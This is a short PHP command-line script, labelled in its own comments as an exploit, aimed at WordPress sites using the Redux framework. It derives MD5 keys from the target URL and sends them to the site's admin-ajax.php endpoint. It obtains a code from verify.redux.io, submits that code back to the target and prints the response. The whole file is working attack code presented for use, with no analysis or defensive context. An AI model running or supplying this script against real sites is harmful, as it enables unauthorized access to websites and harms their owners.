<?php

// Check if the target URL is provided as a command-line argument
if ($argc < 2) {
    die("Usage: php script.php <target_url>\n");
}

$target = $argv[1];

// Function to safely get content from URL with error handling using cURL
function getUrlContent($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if (curl_errno($ch) || $httpCode !== 200) {
        error_log("Error fetching content from URL: $url, HTTP Code: $httpCode, cURL Error: " . curl_error($ch));
        curl_close($ch);
        return null;
    }
    
    curl_close($ch);
    return $response;
}

// Generate MD5 hash
function generateMd5($input) {
    return md5($input);
}

// Main function to execute the exploit
function executeExploit($target) {
    try {
        $key1 = generateMd5("$target/-redux");
        $url1 = "$target/wp-admin/admin-ajax.php?action=$key1";
        $key2 = getUrlContent($url1);

        if ($key2 === null) {
            throw new Exception('Unable to fetch the first key content');
        }

        $key3 = generateMd5($key2 . '-support');
        $redux_code_url = "http://verify.redux.io/?hash=$key3&site=$target";
        $redux_code = getUrlContent($redux_code_url);

        if ($redux_code === null) {
            throw new Exception('Unable to fetch Redux code');
        }

        $final_url = "$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code";
        $final_response = getUrlContent($final_url);

        if ($final_response === null) {
            throw new Exception('Unable to fetch the final response');
        }

        echo $final_response;
    } catch (Exception $e) {
        error_log($e->getMessage());
        echo 'An error occurred. Please check the logs for more details.';
    }
}

// Execute the exploit
executeExploit($target);

?>